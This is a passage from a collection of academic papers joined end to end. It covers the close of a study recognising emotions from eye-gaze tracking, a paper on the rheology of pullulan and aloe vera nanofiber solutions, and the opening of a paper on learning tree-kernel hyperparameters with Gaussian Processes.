speed in the gaze trajectory. Emotion stimuli Average changes in speed (mean ± std), [pixels/frame] ‘‘Neutral’’ 0.011±29.67 ‘‘Disgust’’ 0.0024±7.02 ‘‘Shameful’’ 0.02±57.10 ‘‘Sensory pleasure’’ −0.0021±44.68 a direction in which the gaze is moving. Therefore, a negative value of speed represents only a direction of gazing and how rapidly it changes. The results showed that the smallest speed value was estimated from the gaze trajectory when a person was stimulated with disgusting emotional stimuli. The highest speed values were generated when a person was stimulated with shameful emotional stimuli. An average distribution in results of 30 people clearly illustrates that movement speeds were quite consistent and varied only during a playback of ‘‘shameful’’ content. The acceleration increased when our test subject experienced ‘‘strong’’ emotions or he was very interested in the information shown during the time-frame on a screen. Close to zero (0) value indicates that a person is focused for the moment (gaze does not move or the movement is minor). Negative and positive values are ‘‘fluctuations’’ to another point of interest on screen. Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 16/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.75 Figure 10 Average histogram and probability density function (top left corner) of changes in speed of a gaze point when a person was stimulated with (A) neutral, (B) disgust, (C) shameful and (D) ‘‘sensory pleasure’’ emotional stimuli. Table 3 Average confusion matrix. Emotion ‘‘Neutral’’ ‘‘Disgust’’ ‘‘Shameful’’ ‘‘Sensory pleasure’’ ‘‘Neutral’’ 0.85 0.03 0.07 0.05 ‘‘Disgust’’ 0.02 0.92 0.04 0.02 ‘‘Shameful’’ 0.05 0.05 0.82 0.08 ‘‘Sensory pleasure’’ 0.03 0.00 0.02 0.95 Table 3 illustrates an averaged confusion matrix (ACM) for all participants. The average classification accuracy is 0.85 and false positive is 0.04. Measured misclassification value was similar to every emotion. Figure 11 illustrates the relationship between classification accuracy and a number of feature samples. A number of feature samples is represented on a horizontal axis and the achieved accuracy value is represented on a vertical axis. A curve of different colors represents different results of different emotional states. A total of 2 s of gaze ‘‘recordings’’ (approximately 17 samples on average) are necessary to achieve a 90 ± 3.5% recognition accuracy of a specific emotional state. Functional curves represent an average classification accuracy for all participants (combined). The largest changes in human’s visual mechanism Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 17/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.75 Figure 11 Relationship curves between classification accuracy and recorded samples used per classifi- cation feature (person dependent mode). Figure 12 Relationship curves between classification accuracy and recorded samples used per classifi- cation feature (person independent mode). Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 18/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.75 that relay to an emotion are generated at the very beginning of emotional stimulation. The more samples we use (Frames * (d, x, y, v)), the more information we give to a NN which might not necessary accurately represent certain emotion. Figure 12 shows person independent recognition performance, achieved by training ANN with emotional profiles of 10 people, and using the measured profiles of the remaining 20 persons for overall person-independent recognition accuracy evaluation. In a person independent mode, the best overall accuracy of 71.25±5.1% was achieved using 13 samples and in comparison at 17 samples we have measured only 64.5 ± 4.2% overall recognition accuracy. DISCUSSION AND CONCLUSION The experiments have shown that each participant reacts differently to emotionally stimulating videos and the reaction or the emotional response strongly correlates with a cognitive perception, motivation and individual live experience of that person. Attention concentration maps proved to be very different for each visual stimulus. A certain person’s emotional state was recognized with a ∼90% of accuracy within an acceptable range of around 1 meter (eye-to-camera). Approximately 2 s (∼17 samples per feature) of measurements were needed to recognize a specific emotional state with a 10 ± 1.2% recognition error. The recognition error increased rapidly when fewer samples were used. ‘‘Disgust’’ emotional state was recognized with a highest recognition rate of 90.40±3.5%. In this case, a clear distinction was noticed in a decreased (smaller than average) pupil’s size and a smaller distribution of the attention concentration maps. A ‘‘neutral’’ emotional state was recognized worst with a 13 ± 1.5% recognition error. Compared to our previous works (Raudonis et al., 2013; Raudonis, 2012) where a close- to-eye gaze-tracker (mounted on glasses) and a comparable method of testing/algorithm was used, we have achieved a comparable result. Recognition accuracy also ranged in the interval from 80 to 90%, depending on a specific person and a certain emotion. A somewhat better recognition accuracy of the current remote eye tracker could also be contributed to an improved algorithm and (likely) to different hardware. The future possibility of accurately determining an emotion without per-user gaze- tracker pre-calibration is very daunting (Wang, Wang & Ji, 2016; Alnajar et al., 2013). In a person independent mode we were able to achieve the best overall accuracy of 71.25±5.1% using 13 samples. Ongoing investigation will naturally involve the rest of the main emotion group, and possibly other classification algorithms and methods. We are going to combine visual/audio stimuli with things you can touch and smell to better provoke the effect. We also aim at revisiting our previous experiments with a close-to-eye gaze-tracker to verify if renewed algorithms have had a noticeable effect on the overall recognition accuracy. ACKNOWLEDGEMENTS Authors would like to thank Giedre Dregvaite for organizational help and administrative support over the course of experiments. Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 19/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.75 ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Rytis Maskeliunas and Vidas Raudonis conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): Research on human subjects was approved by an Institutional Review Board of Kaunas University of Technology (document # 1409-16-04). Data Availability The following information was supplied regarding data availability: The raw data has been supplied as Data S1. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.75#supplemental-information. REFERENCES Al-Omar D. 2013. Emotional intelligence screening: detecting emotional arousal in non- communicative individuals. MSc Report. College of Computer and Information Sciences, King Saud University. Al-Omar D, Al-Wabil A, Fawzi M. 2013. Using pupil size variation during visual emo- tional stimulation in measuring affective states of non communicative individuals. In: Universal access in human-computer interaction. User and context diversity. Lecture notes in computer science, vol. 8010. Berlin Heidelberg: Springer, 253–258. Alnajar F, Gevers T, Valenti R, Ghebreab S. 2013. Calibration-free gaze estimation using human gaze patterns. In: Proceedings of the IEEE international conference on computer vision. Piscataway: IEEE, 137–144. Bal E, Harden E, Lamb D, Van Hecke AV, Denver JW, Porges SW. 2010. Emotion recognition in children with autism spectrum disorders: relations to eye gaze and autonomic state. Journal of Autism and Developmental Disorders 40(3):358–370. Beatty J, Lucero-Wagoner B. 2000. The pupillary system. Cambridge: Cambridge University Press, 142–162. Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 20/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.75/supp-1 http://dx.doi.org/10.7717/peerj-cs.75#supplemental-information http://dx.doi.org/10.7717/peerj-cs.75#supplemental-information http://dx.doi.org/10.7717/peerj-cs.75 Bee N, André E, Tober S. 2009. Breaking the ice in human-agent communication: eye- gaze based initiation of contact with an embodied conversational agent. In: Lecture notes in computer science, vol. 5773. Berlin Heidelberg: Springer, 229–242. Budimir S, Palmovic M. 2011. Gaze Differences in Processing Pictures with Emotional Content. Collegium Antropologicum 35(1):17–23. Calandra DM, Di Mauro D, D’Auria D, Cutugno F. 2015. E.Y.E. C. U.: an emotional eye tracker for cultural heritage support. In: Empowering organizations. Lecture notes in information systems and organisation, vol. 11. Berlin Heidelberg: Springer, 161–172. Calvo MG, Lang PJ. 2004. Gaze patterns when looking at emotional pictures: motivation- ally biased attention. Motivation and Emotion 28(3):221–243 DOI 10.1023/B:MOEM.0000040153.26156.ed. Christianson SA, Loftus EF, Hoffman H, Loftus GR. 1991. Eye fixations and memory for emotional events. Journal of Experimental Psychology: Learning, Memory, and Cognition 17(4):693–701 DOI 10.1037/0278-7393.17.4.693. D’Mello S, Olney A, Williams C, Hays P. 2012. Gaze tutor: a gaze-reactive intelligent tutoring system. International Journal of Human-Computer Studies 70(5):377–398 DOI 10.1016/j.ijhcs.2012.01.004. Duque A, Sanchez A, Vazquez C. 2014. Gaze-fixation and pupil dilation in the processing of emotional faces: the role of rumination. Cognition and Emotion 28(8):1347–1366 DOI 10.1080/02699931.2014.881327. Ekman P. 1999. Basic emotions. In: Dalgleish T, Power T, eds. (PDF). The handbook of cognition and emotion. Sussex: John Wiley & Sons, Ltd., 45–60. Hess EH. 1975. The tell-tale eye: how your eyes reveal hidden thoughts and emotions. Oxford: Van Nostrand Reinhold, 259 p. Iskander DR, Collins MJ, Mioschek S, Trunk M. 2004. Automatic pupillometry from digital images. IEEE Transactions on Biomedical Engineering 51(9):1619–1627 DOI 10.1109/TBME.2004.827546. Kappas A, Krämer NC. 2011. Face-to-Face communication over the internet: emotions in a web of culture, language, and technology (studies in emotion and social interaction). Cambridge: Cambridge University Press, 316 p. Kuhn G, Tipples J. 2011. Increased gaze following for fearful faces. It depends on what you’re looking for! Psychonomic Bulletin & Review 18(1):89–95 DOI 10.3758/s13423-010-0033-1. Lanatà A, Valenza G, Scilingo EP. 2013. Eye gaze patterns in emotional pictures. Journal of Ambient Intelligence and Humanized Computing 4(6):705–715 DOI 10.1007/s12652-012-0147-6. Lance BJ, Marsella SC. 2008. A model of gaze for the purpose of emotional expression in virtual embodied agents. In: Proceedings of the 7th international joint conference on autonomous agents and multiagent systems, Vol. 1, 199–206. Lu H, Lu S, Yang G. 2012. Robust eye tracking in video sequence. Journal of Circuits, Systems, and Computers 21(1):209–221. Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 21/22 https://peerj.com http://dx.doi.org/10.1023/B:MOEM.0000040153.26156.ed http://dx.doi.org/10.1037/0278-7393.17.4.693 http://dx.doi.org/10.1016/j.ijhcs.2012.01.004 http://dx.doi.org/10.1080/02699931.2014.881327 http://dx.doi.org/10.1109/TBME.2004.827546 http://dx.doi.org/10.3758/s13423-010-0033-1 http://dx.doi.org/10.1007/s12652-012-0147-6 http://dx.doi.org/10.7717/peerj-cs.75 Murphya NA, Isaacowitza DM. 2010. Age effects and gaze patterns in recognising emotional expressions: An in-depth look at gaze measures and covariates. Cognition and Emotion. 24(3):436–452 DOI 10.1080/02699930802664623. Nguyen HT, Isaacowitz DM, Rubin PA. 2009. Age- and fatigue-related markers of human faces: an eye-tracking study. Ophthalmology 116(2):355–360 DOI 10.1016/j.ophtha.2008.10.007. Nummenmaa L, Hyönä J, Calvo MG. 2016. Eye movement assessment of selective attentional capture by emotional pictures. Emotion 6(2):257–268. Plutchik R. 1999. The nature of emotions. American Scientist 89:344–350. Raudonis V. 2012. Agne paulauskaite-taraseviciene, rytis maskeliunas., vision enhance- ment technique based on eye tracking system. In: Exploring the abyss of inequalities. Communications in computer and information science, vol. 313, 150–160. Raudonis V, Dervinis G, Vilkauskas A, Kersulyte G. 2013. Evaluation of human emotion from eye motions. IJACSA 4(8):79–85. Ringeval F, Sonderegger A, Noris B, Billard A, Sauer J, Lalanne D. 2013. On the influence of emotional feedback on emotion awareness and gaze behavior affective computing and intelligent interaction. In: 2013 Humaine Association conference on affective computing and intelligent interaction (ACII). 448–453. Roche L, Roche B. 2007. Seeing people eye to eye. The Tampa Tribune. Available at http://www.highlandstoday.com/news/agri-leader/2007/oct/26/seeing-people-eye- eye-ar-314915/ . Soleymani M, Lichtenauer J, Pun T, Pantic M. 2012. A multimodal database for affect recognition and implicit tagging. Affective Computing, IEEE Transactions on 3(1):42–55 DOI 10.1109/T-AFFC.2011.25. Soleymani M, Pantic M, Pun T. 2012. Multimodal emotion recognition in response to videos. Affective Computing, IEEE Transactions on 3(2):211–223 DOI 10.1109/T-AFFC.2011.37. Stanley JT, Zhang X, Fung HH, Isaacowitz DM. 2013. Cultural differences in gaze and emotion recognition: Americans contrast more than Chinese. Emotion 13(1):36–46 DOI 10.1037/a0029209. Tubbs S. 2009. Human communication: Principles and contexts. 12th edition. New York: McGraw-Hill, 550p. Urry HL. 2010. Seeing, thinking, and feeling: emotion-regulating effects of gaze-directed cognitive reappraisal. Emotion 10(1):125–135 DOI 10.1037/a0017434. Viola P, Jones MJ. 2004. Robust real-time face detection. International Journal of Cumputer Vision 57(2):137–154 DOI 10.1023/B:VISI.0000013087.49260.fb. Wang K, Wang S, Ji Q. 2016. Deep eye fixation map learning for calibration-free eye gaze tracking. In: Proceedings of the ninth biennial ACM symposium on eye tracking research & applications. New York: ACM, 47–55. Maskeliunas and Raudonis (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.75 22/22 https://peerj.com http://dx.doi.org/10.1080/02699930802664623 http://dx.doi.org/10.1016/j.ophtha.2008.10.007 http://www.highlandstoday.com/news/agri-leader/2007/oct/26/seeing-people-eye-eye-ar-314915/ http://www.highlandstoday.com/news/agri-leader/2007/oct/26/seeing-people-eye-eye-ar-314915/ http://dx.doi.org/10.1109/T-AFFC.2011.25 http://dx.doi.org/10.1109/T-AFFC.2011.37 http://dx.doi.org/10.1037/a0029209 http://dx.doi.org/10.1037/a0017434 http://dx.doi.org/10.1023/B:VISI.0000013087.49260.fb http://dx.doi.org/10.7717/peerj-cs.75 work_nkcageyhhnffraxcotcfqod4q4 ---- Conference Full Paper template International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 DOI: 10.21307/ijanmc-2020-022 9 Rheological Properties of Pullulan and Aloe Vera Nanofiber Solutions Haifa El-sadi Wentworth institute of technology Boston, USA E-mail: elsadih@wit.edu Sally Shady Stevens institute of technology, Hoboken, NJ E-mail: sshady@stevens.edu Alex Bossart Stevens institute of technology, Hoboken, NJ Dilhan Kalyon Stevens institute of technology, Hoboken, NJ Abstract—Nanofibers have been used with increasing success for drug delivery and various biomedical engineering applications. The mixture of 13% pullulan- aloe vera can be pumped with a minor effects on the flow behavior. The fiber is then characterized by SEM, shear viscosity, storage and loss moduli. The oscillatory shear data is employed. The mixture has a complex rheological properties that includes extreme shear- thinning as well as viscoelastic properties and yield stress. The rheology of the pullulan- aloe vera nanofber was characterized, the measurement method may influence the results, it is unclear how the behavior near walls influence the measurement method, Parallel-plate rheometer is used to measure rheological properties. The data and rheological parameters should facilitate a better understanding of the process-ability characteristics of the mixture. The cross model provides a simple way of quantifying the viscosity/shear rate profile for a shear thinning mixture. SEM images are carried out. Keywords-Nanofiber; Rheology; Pulluan; Aloevera; Yield Stress I. INTRODUCTION Aloe vera is a therapeutic medicinal plant that has been used for many centuries to treat a wide range of ailments. There are over 250 species of the Aloe vera plant that have been studied. The most popular commercially grown are Aloe barbadensis miller and Aloe arborescens [1]. Many of the health benefits are associated with the structure and internal composition of the plant. Studies have shown that the active ingredients in the aloe vera plant have demonstrated wound healing, antifungal, anti-inflammatory, anticancer, immunomodulatory and gastroprotective properties [2-4]. Despite the exceptional healing properties of the aloe vera plant, there are several limitations with keeping these active ingredients stable. The bioactivity of the plant decreases approximately 6 hours after harvesting [1,5]. Exposure to light, humidity and temperature can also diminish these significant properties. Current techniques used to overcome these challenges have been focused on the usage of antioxidants and stabilizing agents. Such methods introduce other chemicals that would limit the scalability and purity of using non-toxic ingredients. Pullulan is a linear polysaccharide produced by the polymorphic fungus Aureobasidium pullulans. Pullulan has a wide range of commercial and industrial applications in many fields such as food science, health care, pharmacy and even in lithography [6-8]. Pullulan is a water-soluble, low moisture permeable polysaccharide with excellent mechanical properties[9]. Due to these properties, pullulan is often used as a drug tablet coating. As a result, pullulan has been used in many drug delivery applications including nanotechnology [8, 10-12]. Nanofibers have been used with increasing success for drug delivery due to their extremely high surface to volume ratio, low density, and high porosity [reference]. In order to prevent aloe vera from International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 10 degrading, it can be electrospun into nanofibers to encapsulate, preserve and administer the unique properties of aloe vera. Pullulan, is a biodegradable polymer with adhesive properties that can has been shown success in the electrospinning [10]. In this study, we investigate the rheological properties of pullulan- aloe vera nanofibers, which will provide insight into the material properties in a scaled-up manufacturing process. II. MATERIALS AND METHOD A. Nanofiber preparation A mixture of polymer Pullulan Pf-20 food grade (Nagase, Japan), Molecular weight 200,000 g/ mol and fresh aloe vera were used to create nanofibers. To prepare the nanofibers, first aloe vera leaves were first washed and their outer green rinds were removed to obtain the gel fillet. The gel was then broken down by using a conventional blender (Ninja BL490T) at an agitator speed of 21000 rpm. The procedure was performed within 60s to avoid enzymatic decomposition [13]. A homogenous gel mixture was then formed using 13% pullulan. The solution was then electrospun using a Harvard apparatus PHD 4400 syringe pump at 28 and 30 kV with a distance of 20 cm and a flowrate of 7.2 µl/mine.. B. Scanning Electron Microscopy (SEM) A Zeiss Auriga Focused ION FE SEM (Oberkochen, Germany). All materials were coated with gold nanoparticles for one minute using a Leica EM MED020 (Wetzlar, Germany) under vacuum. Analysis was carried out at 2.00 kV EHT, and estimation of the dimensions of the fibers was performed using ImageJ and DiameterJ. C. Rheological Properties Prepared mixture was loaded between two 50mm- diameter parallel plates with a gap of 0.5mm in rheometer (ARES). High frequency and strain were chosen to make sure that enough torque was generated for the transducer. Time sweep test with frequency of 50rps and strain of 10% was performed to analyze the evaporation effect of the mixture to the result. Prior to dynamic property measurements, strain sweep test at constant frequency of 50rps determined the linear viscoelastic regions. Frequency range of 1-100rps and strain of 10% (within linear viscoelastic region) was performed in frequency sweep test at room temperature to obtain dynamic properties (G’,G’’) of the mixtures. G’, the storage modulus which describes the elastic properties and G’’, the loss modulus, which describes the viscous properties, were calculated by a computer program of the rheometer by deconvolution the torque (shear stress) versus time data. III. DISCUSSION The homogenous solution of 13% pullulan in aloe vera were prepared to study the rheological properties of these nanofibers as shown in Figure 1. These properties will demonstrate the capabilities of the material solution in manufacturing processes such as 3D printing and extrusion. To our knowledge, this is the first study to prepare pullulan-aloe vera nanofibers from a fresh aloe vera plant. With the medicinal properties of aloe vera, pullulan is used as a carrier to help stabilize the bioactivity. SEM images confirmed that pullulan- aloe vera nanofibers can be successfully developed as shown in Figure 2 and 3. The 28kV group produced 82 + 13 nm while the 30kV group was 99 + 21nm [10]. Fibers prepared at the 28kV setting produced nanofibers that were more consistent. The storage (elastic) and loss (viscous) modulus of the mixture (pullulan and Aloe Vera) at 19oC for 3 s are increasing with the frequency as shown in Figure 4. The storage and loss modulus are almost constant at low frequency and increase significantly at higher frequencies which is related to the increase in the interaction between mixture components. It is observed that the viscous modulus is significantly larger than the storage modulus. It is very obvious that viscous modulus is higher than elastic modulus. Figure 5 shows the viscoelastic behavior of the mixture of pullulan and Aloe Vera, the complex modulus increases with increasing the frequency. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 11 Figure 1. The overall process to develop the nanofiber demonstrating the multiple applications. Figure 2. Nanofiber using PHD 4400 Syringe Pump at 30 kV (a) 10,000 times magnification, (b) 50,000 times magnification Figure 3. Nanofiber using PHD 4400 Syringe Pump at 28 kV (a) 50,000 times magnification, (b) 25,000 times magnification International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 12 Figure 4. Elastic and viscous modulus of a mixture as a function of frequency at 19 oC. Figure 5. Complex modulus as a function of frequency at 19 oC Figure 6 describes the changes in viscosity of the mixture of pullulan and aloe vera with respect to stress. The figure shows that the viscosity is decreasing with increasing the stress. Such viscosity decrease is directly related to the decrease of zeta potential. The yield stress is a key parameter in production, determining the force required to fill a product into its container or to flow. The stress at the viscosity maximum, is a measure for the yield stress. The yield stress is 0.07 pa which it shows that small amount of force is required to flow. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 13 Figure 6. (a) Viscosity vs. stress, (b) Viscosity vs. shear rate Cross rheological model shear thinning model gives a good agreement with measured data. γ̇ is the shear rate, η0, the zero shear viscosity and it is zero. m is the cross rate constant. It is dimensionless and is a measure of the degree of dependence of viscosity on shear rate in the shear thinning region. A value of zero for m shows Newtonian behavior and if m =1, it is due to increasing shear thinning behavior 𝜂 = 𝜂∞ + 𝜂0− 𝜂∞ 1+ (𝑐𝛾)̇𝑚 (1) η = η∞ − η∞ 1+ (cγ)̇m (2) C is the cross time constant and has time unit. m and 1/C are related to the texture of the mixture, pumping and the characteristics of mixing and pouring of the flow. Figure 7 indicates that at C=50, the cross model fits the experimental data at shear rate above than 1.76 1/s. this might be due to the experimental error. Above C=50 the cross model isn’t applicable for this type of mixture. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 14 Figure 7. Validation of cross model with experimental data. The rheometer was again used for stress relaxation experiments. The mixture of pullulan and Aloe vera is stable under temperature 19 oC as shown in Figure 8. However viscous modulus is higher than elastic modulus of the mixture. Figure 8. Storage and loss modulus vs. time IV. CONCLUSION The objective of this research is to study the flow behavior of the mixture of pullulan and aloe vera. Different samples of the mixture have been carried out. It is concluded that the mixture of 13% pullulan-aloe vera can be pumped with a minor effects on the flow behavior. The rheological properties of nanofiber at 50,000 times magnification using PHD 4400 Syringe Pump at 28 kV with a distance 20 cm were carried out. The yield stress is small since it is a key parameter in production, the mixture requires small force to flow. The viscosity decreases with increasing the shear rate. The cross model gives a good agreement with measured data at cross time constant 50 s. However, elastic modulus doesn’t change with increasing the frequency. In the future, more rheological tests will be studied to indicate better predications of the fluids behavior. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 15 REFERENCES [1] Thorat, K. A review of the stability of aloe vera gel. Research J Topic and Cosmetic Sci. [2] Torres- Giner, S. Nanoencapsulation of Aloe vera in synthetic and Naturally occurring polymers by Electrohydrodynamic processing of Interest in Food Technology and Bioactive Packaging [3] Aloe vera Incorporated bioimetic nanofibrous scaffold: a regenerative approach for skin tissue engineering, Suganya, S. [4] Tarameshloo, M., Nourouzian, M., Zarein-Dolab, S. Aloe Vera gel and thyroid hormone cream may improve wound healing in Wistar rats [5] Pellicconi, M., Molinari, G.P. Lucini, L. Stability of the main aloe fractions and aloe-based commercial products under different storage conditions. Agrochimica, Vol. LV-N5, September 2011. [6] Kuan-Chen Cheng, Ali Demirci, Jeffrey M. Catchmark, “Pullulan: biosynthesis, production, and applications, Applied Microbiology and Biotechnology, July 2011. [7] Ram S.SinghaGaganpreet K.SainiaJohn F.Kennedy, “Pullulan: Microbial sources, production and applications”, Carbohydrate Polymers, Volume 73, Issue 4, 5 September 2008, Pages 515-531. [8] Shady, S, Gaines, P. Garhwal, R. Leahy, C. Ellis, E. et al. Synthesis and Characterization of Pullulan-Polycaprolactone Core–Shell Nanospheres Encapsulated with Ciprofloxacin. J of Biomed Nanotech Vol. 9, 1–12, 2013. [9] J.K. Park, T. Khan Other microbial polysaccharides: pullulan, scleroglucan, elsinan, levan, alternant, dextran., in Handbook of Hydrocolloids (Second Edition), 2009. [10] A Bossart, S. Shady, and D. Kalyon, “Electrospun Pullulan Based Nanofibers for Medical Applications”, 42nd Society for 2019 - abstracts.biomaterials.org [11] Burger,Christian, et al. “Nanofibrous Materials and Their Applications”, doi:10.1146/annurev.matsci. 36.011205. 123537. [12] Dias, J R, et al. “Advances in Electrospun Skin Substitutes.” doi:10.1016/j.pmatsci.2016.09.006. [13] Coats B.C. Method of Processing Stabilized aloe Vera gel Obtained from the Whole Aloe Vera Leaf. 5,356,811. U.S. Patent. 1994 Oct 18. work_nkdki33fzvgtxnrotut7r4jdqe ---- Learning Structural Kernels for Natural Language Processing Daniel Beck Department of Computer Science University of Sheffield, United Kingdom debeck1@sheffield.ac.uk Trevor Cohn Computing and Information Systems University of Melbourne, Australia t.cohn@unimelb.edu.au Christian Hardmeier Department of Linguistics and Philology Uppsala University, Sweden christian.hardmeier@lingfil.uu.se Lucia Specia Department of Computer Science University of Sheffield, United Kingdom l.specia@sheffield.ac.uk Abstract Structural kernels are a flexible learning paradigm that has been widely used in Natural Language Processing. However, the problem of model selection in kernel-based methods is usually overlooked. Previous approaches mostly rely on setting default values for ker- nel hyperparameters or using grid search, which is slow and coarse-grained. In con- trast, Bayesian methods allow efficient model selection by maximizing the evidence on the training data through gradient-based methods. In this paper we show how to perform this in the context of structural kernels by using Gaussian Processes. Experimental results on tree kernels show that this procedure results in better prediction performance compared to hyperparameter optimization via grid search. The framework proposed in this paper can be adapted to other structures besides trees, e.g., strings and graphs, thereby extending the util- ity of kernel-based methods. 1 Introduction Kernel-based methods are a staple machine learning approach in Natural Language Processing (NLP). Frequentist kernel methods like the Support Vector Machine (SVM) pushed the state of the art in many NLP tasks, especially classification and regression. One interesting aspect of kernels is their ability to be defined directly on structured objects like strings, trees and graphs. This approach has the potential to move the modelling effort from feature engineering to kernel engineering. This is useful when we do not have much prior knowledge about how the data behaves, as we can more readily define a similarity metric between inputs instead of trying to character- ize which features are the best for the task at hand. Kernels are a very flexible framework: they can be combined and parameterized in many different ways. Complex kernels, however, lead to the prob- lem of model selection, where the aim is to obtain the best kernel configuration in terms of hyperpa- rameter values. The usual approach for model selec- tion in frequentist methods is to employ grid search on some development data disjoint from the training data. This approach can rapidly become impracti- cal when using complex kernels which increase the number of model hyperparameters. Grid search also requires the user to explicitly set the grid values, making it difficult to fine tune the hyperparameters. Recent advances in model selection tackle some of these issues, but have several limitations (see §6 for details). Our proposed approach for model selection re- lies on Gaussian Processes (GPs) (Rasmussen and Williams, 2006), a widely used Bayesian kernel ma- chine. GPs allow efficient and fine-grained model selection by maximizing the evidence on the training data using gradient-based methods, dropping the re- quirement for development data. As a Bayesian pro- cedure, GPs also naturally balance between model capacity and generalization. GPs have been shown to achieve state of the art performance in various re- gression tasks (Hensman et al., 2013; Cohn and Spe- cia, 2013). Therefore, we base our approach on this framework. While prediction performance is important to consider (as we show in our experiments), we are 461 Transactions of the Association for Computational Linguistics, vol. 3, pp. 461–473, 2015. Action Editor: Stefan Riezler. Submission batch: 2/2015; Revision batch 7/2015; Published 8/2015. c©2015 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. mainly interested in two other significant aspects that are enabled by our approach: • Gradient-based methods are more efficient than grid search for high dimensional spaces. This allows us to easily propose new rich kernel ex- tensions that rely on a large number of hyper- parameters, which in turn can result in better modelling capacity. • Since the model selection process is now fine- grained, we can interpret the resulting hyperpa- rameter values, depending on how the kernel is defined. In this work we focus on tree kernels, which have been successfully used in a number of NLP tasks (see §6). In most cases, these kernels are used as an SVM component and model selection is not consid- ered an important issue. Hyperparameters are usu- ally set to default values, which work reasonably well in terms of prediction performance. However, this is only possible due to the small number of hy- perparameters these kernels contain. We perform experiments comprising synthetic data (§4) and two real NLP regression tasks: Emo- tion Analysis (§5.1) and Translation Quality Estima- tion (§5.2). Our findings show that our approach out- performs SVMs using the same kernels. 2 Gaussian Process Regression Our definition of GPs closely follows that of Rasmussen and Williams (2006). Consider a setting where we have a dataset X = {(x1,y1), (x2,y2), . . . , (xn,yn)}, where xi is a d- dimensional input and yi the corresponding out- put. Our goal is to infer an underlying function f : Rd → R to explain this data, i.e. f(xi) ≈ yi. Formally, f is drawn from a GP prior, f(x) ∼GP(µ(x),k(x,x′)), where µ(x) is the mean function, which is usually the 0 constant, and k(x,x′) is the kernel function. In a regression setting, we assume that the res- ponse variables are noisy latent function evaluations, i.e., yi = f(xi) + η, where η ∼ N(0,σ2n) is added white noise. We assume a Gaussian likeli- hood, which allows us to obtain a closed formula solution for the posterior, namely y∗ ∼N(k∗(K + σnI)−1yT , k(x∗,x∗) −kT∗ (K + σnI)−1k∗), where x∗ and y∗ are respectively the test input and its response variable, K is the Gram matrix corresponding to the training inputs and k∗ = [〈x1,x∗〉,〈x2,x∗〉, . . . ,〈xn,x∗〉] is the vector of kernel evaluations between the test input and each training input. A key property of GP models is their ability to perform efficient model selection. This is achieved by employing gradient-based methods to maximize the marginal likelihood, p(y|X,θ) = ∫ p(y|X,θ,f)p(f)df, where θ represents the vector of model hyperparam- eters and y is the vector of response variables from the training data. For a Gaussian likelihood, we can take the log of the expression above to obtain in closed-form1, log p(y|X,θ) = −1 2 yT G−1y ︸︷︷︸ data fit −1 2 log |G| ︸︷︷︸ complexity penalty −n 2 log 2π ︸︷︷︸ constant where G = K +σnI. The data fit term is dependent on the training response variables, while the com- plexity penalty term relies only on the kernel and training inputs. Since the first two terms have con- flicting objectives, optimizing the log marginal like- lihood will naturally achieve a compromise and thus limit overfitting (without the need for any validation step or additional data). To enable gradient-based optimization we need to derive the gradients w.r.t. the hyperparameters: ∂ ∂θj log p(y|X,θ) = 1 2 yT G−1 ∂G ∂θj G−1y − 1 2 trace ( G−1 ∂G ∂θj ) . 1See Rasmussen and Williams (2006, pp. 113-114) for de- tails on the derivation of this formula and also its correspondent gradient calculation. 462 The gradients of G depend on the underlying ker- nel. Therefore we can employ any kind of valid kernel in this procedure as long as its gradients can be computed. This not only allows for fine-tuning of hyperparameters but also allows for kernel exten- sions which are richly parameterized. 3 Tree Kernels The seminal work on Convolution Kernels by Haus- sler (1999) defines a broad class of kernels on dis- crete structures by counting and weighting the num- ber of substructures they share. Applying Haussler’s formulation to trees we reach a general formula for a tree kernel between two trees t1 and t2, namely k(t1, t2) = ∑ f∈F w(f)c1(f)c2(f), (1) where F is the set of all tree fragments, c1(f) and c2(f) return the counts for fragment f in trees t1 and t2, respectively, and w(f) assigns a weight to frag- ment f. In other words, we can consider the ker- nel a weighted dot product over vectors of fragment counts. The actual fragment set F is deliberately left undefined: different concepts of tree fragments define different tree kernels. In this paper, we will focus on Subset Tree Ker- nels (henceforth SSTK), first introduced by Collins and Duffy (2001). This kernel considers tree frag- ments that contains complete grammar rules (see Figure 1 for an example). Consider the set of nodes in the two trees as N1 and N2 respectively. We de- fine Ii(n) as an indicator function that returns 1 if fragment fi ∈ F has root n and 0 otherwise. A SSTK can then be defined as: k(t1, t2) = ∑ n1∈N1 ∑ n2∈N2 ∆(n1,n2) , (2) where ∆(n1,n2) = |F|∑ i=1 λ s(i) 2 Ii(n1)Ii(n2) and s(i) is the number of fragments in i with at least one child2. The formulation in Equation 2 is the same as the one shown in Equation 1, except that we are now restricting the weights w(f) to be a function of a 2See Pighin and Moschitti (2010) for details and a proof on this derivation. Tree Fragments S B b A a A a B b S BA S BA a S B b A S B b A a Figure 1: An example tree and the respective set of tree fragments defined by a SSTK. hyperparameter 